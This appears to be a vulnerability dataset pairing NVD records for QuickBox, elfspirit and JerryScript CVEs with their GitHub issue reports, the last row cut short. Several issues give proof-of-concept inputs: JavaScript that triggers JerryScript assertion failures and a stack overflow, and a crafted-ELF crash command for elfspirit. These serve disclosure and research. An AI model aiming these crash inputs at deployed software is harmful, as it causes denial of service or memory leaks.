cve_id
stringlengths
13
16
cve_published
stringdate
2019-01-01 16:29:00
2025-02-25 20:15:37
cve_descriptions
stringlengths
34
2.6k
cve_metrics
dict
cve_references
listlengths
1
281
cve_configurations
listlengths
1
70
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
164 values
url
stringlengths
36
97
cve_tags
listlengths
1
5
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
198k
issue_title
stringlengths
1
335
issue_comments_url
stringlengths
55
116
issue_comments_count
int64
0
338
issue_created_at
stringdate
2012-06-06 09:34:24
2025-04-02 09:37:20
issue_updated_at
stringdate
2014-04-01 20:16:21
2025-06-16 12:26:58
issue_html_url
stringlengths
36
97
issue_github_id
int64
4.93M
2.97B
issue_number
int64
1
199k
__index_level_0__
int64
0
6.55k
CVE-2021-44981
2022-01-24T13:15:08.177
In QuickBox Pro v2.5.8 and below, the config.php file has a variable which takes a GET parameter value and parses it into a shell_exec(''); function without properly sanitizing any shell arguments, therefore remote code execution is possible. Additionally, as the media server is running as root by default attackers can use the sudo command within this shell_exec(''); function, which allows for privilege escalation by means of RCE.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 10, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/QuickBox/QB/issues/202" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://websec.nl/blog/61b2b37a43a1155c848f3b08/websec%20finds%20critical%20vulnerabilities%20in%20popular%20media%20server" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/QuickBox/QB/issues/202" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://websec.nl/blog/61b2b37a43a1155c848f3b08/websec%20finds%20critical%20vulnerabilities%20in%20popular%20media%20server" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:quickbox:quickbox:*:*:*:*:community:*:*:*", "matchCriteriaId": "539517B3-AB8A-42AE-AD72-D337662A5FA1", "versionEndExcluding": null, "versionEndIncluding": "2.5.8", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:quickbox:quickbox:*:*:*:*:pro:*:*:*", "matchCriteriaId": "AB153559-7B02-40EA-B473-1D7E0D2EA171", "versionEndExcluding": null, "versionEndIncluding": "2.5.8", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "78" ]
78
https://github.com/QuickBox/QB/issues/202
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "QuickBox", "QB" ]
Hey there! I belong to an open source security research community, and a member (@websecnl) has found an issue, but doesn’t know the best way to disclose it. If not a hassle, might you kindly add a `SECURITY.md` file with an email, or another contact method? GitHub [recommends](https://docs.github.com/en/code-security/getting-started/adding-a-security-policy-to-your-repository) this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future. Thank you for your consideration, and I look forward to hearing from you! (cc @huntr-helper)
Responsible disclosure policy
https://api.github.com/repos/QuickBox/QB/issues/202/comments
9
2021-12-09T10:22:21Z
2022-02-03T11:42:53Z
https://github.com/QuickBox/QB/issues/202
1,075,401,997
202
3,080
CVE-2022-21711
2022-01-24T20:15:08.657
elfspirit is an ELF static analysis and injection framework that parses, manipulates, and camouflages ELF files. When analyzing the ELF file format in versions prior to 1.1, there is an out-of-bounds read bug, which can lead to application crashes or information leakage. By constructing a special format ELF file, the information of any address can be leaked. elfspirit version 1.1 contains a patch for this issue.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.2, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/liyansong2018/elfspirit/commit/c5b0f5a9a24f2451bbeda4751d67633bc375e608" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/liyansong2018/elfspirit/issues/1" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/liyansong2018/elfspirit/security/advisories/GHSA-jr8h-2657-m68r" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/liyansong2018/elfspirit/commit/c5b0f5a9a24f2451bbeda4751d67633bc375e608" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/liyansong2018/elfspirit/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/liyansong2018/elfspirit/security/advisories/GHSA-jr8h-2657-m68r" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:elfspirit_project:elfspirit:*:*:*:*:*:*:*:*", "matchCriteriaId": "984FF703-F7AC-4EE2-A048-E5EE4DCC33F4", "versionEndExcluding": "1.1.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/liyansong2018/elfspirit/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "liyansong2018", "elfspirit" ]
poc ```shell $ ./elfspirit parse id_000000 ``` log ```shell [+] ELF Header e_type: 3 -> A shared object e_machine: 62 -> Intel 80386 e_version: 1 -> Current version e_entry: 4176 e_phoff: 64 e_shoff: 13608 e_flags: 0 e_ehsize: 64 e_phentsize: 56 e_phnum: 9 e_shentsize: 64 e_shentsize: 64 e_shstrndx: 27 [+] Section Header Table [Nr] Name Type Addr Off Size Es Flg Lk Inf Al AddressSanitizer:DEADLYSIGNAL ================================================================= ==193419==ERROR: AddressSanitizer: SEGV on unknown address 0x7f08638c5000 (pc 0x7f0842727231 bp 0x7ffcbf981330 sp 0x7ffcbf980ad8 T0) ==193419==The signal is caused by a READ memory access. #0 0x7f0842727231 (/lib/x86_64-linux-gnu/libc.so.6+0x15f231) #1 0x7f08427c9a8c in __interceptor_strlen ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:368 #2 0x55862b528026 in parse /home/lys/Tools/elfspirit/parse.c:975 #3 0x55862b4c5167 in readcmdline /home/lys/Tools/elfspirit/main.c:251 #4 0x55862b4c5167 in main /home/lys/Tools/elfspirit/main.c:263 #5 0x7f08425efe49 in __libc_start_main ../csu/libc-start.c:314 #6 0x55862b4c5d09 in _start (/home/lys/Tools/elfspirit/elfspirit+0x9d09) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0x15f231) ==193419==ABORTING ``` [poc.zip](https://github.com/liyansong2018/elfspirit/files/7920475/poc.zip)
Out-of-bounds read in elf parsing.
https://api.github.com/repos/secnotes/elfspirit/issues/1/comments
0
2022-01-23T12:32:42Z
2022-03-28T15:50:55Z
https://github.com/secnotes/elfspirit/issues/1
1,111,858,333
1
3,081
CVE-2021-44988
2022-01-25T01:15:07.640
Jerryscript v3.0.0 and below was discovered to contain a stack overflow via ecma_find_named_property in ecma-helpers.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4890" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4891" }, { "source": "cve@mitre.org", "tags": [ "Not Applicable" ], "url": "https://security.samsungmobile.com/securityUpdate.smsb" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4890" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4891" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Not Applicable" ], "url": "https://security.samsungmobile.com/securityUpdate.smsb" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "770" ]
770
https://github.com/jerryscript-project/jerryscript/issues/4891
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision Commit: [51da1551](https://github.com/jerryscript-project/jerryscript/commit/51da15516e1436184be9914314f76d596f14cd27) Version: v3.0.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86_64) ###### Build steps ```bash ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --profile=es2015-subset --stack-limit=20 ``` ###### Test case ```javascript let array = new Array(1); array.splice(1, 0, array); array.flat(Infinity); ``` ​ ###### Execution steps & Output ```bash $ ./jerryscript/build/bin/jerry poc.js ASAN:DEADLYSIGNAL ================================================================= ==37207==ERROR: AddressSanitizer: stack-overflow on address 0xff6f2ffc (pc 0x566c8fbc bp 0xff6f3040 sp 0xff6f3000 T0) #0 0x566c8fbb in ecma_find_named_property /root/jerryscript/jerry-core/ecma/base/ecma-helpers.c:618 #1 0x56a91e1f (/root/jerryscript/build/bin/jerry+0x477e1f) SUMMARY: AddressSanitizer: stack-overflow /root/jerryscript/jerry-core/ecma/base/ecma-helpers.c:618 in ecma_find_named_property ==37207==ABORTING ```
Stack-overflow in ecma_find_named_property (ecma-helpers.c)
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4891/comments
1
2021-12-09T14:33:33Z
2021-12-09T14:35:17Z
https://github.com/jerryscript-project/jerryscript/issues/4891
1,075,642,418
4,891
3,082
CVE-2021-44992
2022-01-25T01:15:07.690
There is an Assertion ''ecma_object_is_typedarray (obj_p)'' failed at /jerry-core/ecma/operations/ecma-typedarray-object.c in Jerryscript 3.0.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4875" }, { "source": "cve@mitre.org", "tags": [ "Not Applicable" ], "url": "https://security.samsungmobile.com/securityUpdate.smsb" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4875" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Not Applicable" ], "url": "https://security.samsungmobile.com/securityUpdate.smsb" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "119" ]
119
https://github.com/jerryscript-project/jerryscript/issues/4875
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision Commit: [51da1551](https://github.com/jerryscript-project/jerryscript/commit/51da15516e1436184be9914314f76d596f14cd27) Version: v3.0.0 Commit: [8ba0d1b](https://github.com/jerryscript-project/jerryscript/commit/8ba0d1b6ee5a065a42f3b306771ad8e3c0d819bc) Version: v2.4.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash ./tools/build.py --clean --debug --profile=es2015-subset --compile-flag=-fsanitize=address --compile-flag=-m32 --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20 ``` ###### Test case ```javascript function isPoT(obj, name, type) { let desc; desc = Object.getOwnPropertyDescriptor(obj, name); return typeof type === 'undefined' || typeof desc.value === type; } function getPs(obj, type) { let properties = []; for (let name of Object.getOwnPropertyNames(obj)) { if (isPoT(obj, name, type)) { properties.push(name); } } return properties; } function* genObj(root = this, level = 0) { if (level > 4) { return; } let obj_names = getPs(root, 'object'); for (let obj_name of obj_names) { if (obj_name.startsWith('$')) { continue; } let obj = root[obj_name]; yield obj; yield* genObj(obj, level + 1); } } function JSEtestObj() { let objects = []; for (let obj of genObj()) { if (!objects.includes(obj)) { objects.push(obj); } } return objects; } function JSEtestFunc(obj) { return getPs(obj, 'function'); } const thrower = new Proxy({}, { get() { throw 0xc0defefe; } }); for (let o of JSEtestObj()) { for (let f of JSEtestFunc(o)) { const arityPlusOne = o[f].length + 1; try { o[f](Array(arityPlusOne).fill(thrower)); } catch (e) { if (`${e}`.includes('1')) { try { new o[f](Array(arityPlusOne).fill(thrower)); } catch (e) {} } else { } } } } ``` ​ ###### Execution steps & Output Version: v3.0.0 ```bash $ ./jerryscript/build/bin/jerry poc.js ICE: Assertion 'ecma_object_is_typedarray (obj_p)' failed at /root/jerryscript/jerry-core/ecma/operations/ecma-typedarray-object.c(ecma_get_typedarray_id):764. Error: ERR_FAILED_INTERNAL_ASSERTION ``` Version: v2.4.0 ````bash $ ~/jerryscript-2.4.0/build/bin/jerry poc.js Script Error: assertion failed Script backtrace (top 5): 0: poc.js:72 ```` Credits: Found by OWL337 team.
Assertion 'ecma_object_is_typedarray (obj_p)' failed in ecma-typedarray-object(ecma_get_typedarray_id)
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4875/comments
0
2021-12-09T09:08:53Z
2022-01-12T02:06:25Z
https://github.com/jerryscript-project/jerryscript/issues/4875
1,075,325,382
4,875
3,083
CVE-2021-44993
2022-01-25T01:15:07.730
There is an Assertion ''ecma_is_value_boolean (base_value)'' failed at /jerry-core/ecma/operations/ecma-get-put-value.c in Jerryscript 3.0.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4876" }, { "source": "cve@mitre.org", "tags": [ "Not Applicable" ], "url": "https://security.samsungmobile.com/securityUpdate.smsb" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4876" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Not Applicable" ], "url": "https://security.samsungmobile.com/securityUpdate.smsb" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/jerryscript-project/jerryscript/issues/4876
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision Commit: [51da1551](https://github.com/jerryscript-project/jerryscript/commit/51da15516e1436184be9914314f76d596f14cd27) Version: v3.0.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash ./tools/build.py --clean --debug --profile=es2015-subset --compile-flag=-fsanitize=address --compile-flag=-m32 --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20 ``` ###### Test case ```javascript function JSEtest(f, n = 1000) { for (let i = 0; i < n; i++) { f(); } } JSEtest(function () { class M { constructor() { this._x = 45; } get foo() { return this._x; } } class N extends M { constructor(x = () => super.foo) { super(); x() === 45; } x(x = () => super.foo) { return x(); } } new N().x() === 45; }); ``` ​ ###### Execution steps & Output version 3.0.0 ```bash $ ./jerryscript/build/bin/jerry poc.js ICE: Assertion 'ecma_is_value_boolean (base_value)' failed at /root/jerryscript/jerry-core/ecma/operations/ecma-get-put-value.c(ecma_op_get_value_object_base):205. Error: ERR_FAILED_INTERNAL_ASSERTION ``` Credits: Found by OWL337 team.
Assertion 'ecma_is_value_boolean (base_value)' failed in ecma_op_get_value_object_base (ecma-get-put-value).
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4876/comments
0
2021-12-09T09:48:50Z
2022-01-12T02:06:45Z
https://github.com/jerryscript-project/jerryscript/issues/4876
1,075,367,669
4,876
3,084
CVE-2021-44994
2022-01-25T01:15:07.773
There is an Assertion ''JERRY_CONTEXT (jmem_heap_allocated_size) == 0'' failed at /jerry-core/jmem/jmem-heap.c in Jerryscript 3.0.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4894" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4895" }, { "source": "cve@mitre.org", "tags": [ "Not Applicable" ], "url": "https://security.samsungmobile.com/securityUpdate.smsb" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4894" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4895" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Not Applicable" ], "url": "https://security.samsungmobile.com/securityUpdate.smsb" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/jerryscript-project/jerryscript/issues/4894
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
## JerryScript commit hash 55acdf2048b390d0f56f12e64dbfb2559f0e70ad ## Build platform Ubuntu 20.04 LTS ## Build steps ``` ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-g \ --strip=off --system-allocator=on --logging=on \ --linker-flag=-fuse-ld=gold --error-messages=on --line-info=ON \ --stack-limit=10 ``` ## poc ``` var sab = new SharedArrayBuffer(4); var a = new Int32Array(sab); Atomics.add(a, -0, 1); ``` ## assert log ``` ICE: Assertion 'JERRY_CONTEXT (jmem_heap_allocated_size) == 0' failed at /home/sakura/jerryscript/jerry-core/jmem/jmem-heap.c(jmem_heap_finalize):108. Error: ERR_FAILED_INTERNAL_ASSERTION ```
Assertion 'JERRY_CONTEXT (jmem_heap_allocated_size) == 0' failed at /home/sakura/jerryscript/jerry-core/jmem/jmem-heap.c(jmem_heap_finalize):108.
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4894/comments
1
2021-12-09T14:53:08Z
2022-01-14T09:05:39Z
https://github.com/jerryscript-project/jerryscript/issues/4894
1,075,663,454
4,894
3,085
CVE-2021-44994
2022-01-25T01:15:07.773
There is an Assertion ''JERRY_CONTEXT (jmem_heap_allocated_size) == 0'' failed at /jerry-core/jmem/jmem-heap.c in Jerryscript 3.0.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4894" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4895" }, { "source": "cve@mitre.org", "tags": [ "Not Applicable" ], "url": "https://security.samsungmobile.com/securityUpdate.smsb" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4894" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4895" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Not Applicable" ], "url": "https://security.samsungmobile.com/securityUpdate.smsb" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/jerryscript-project/jerryscript/issues/4895
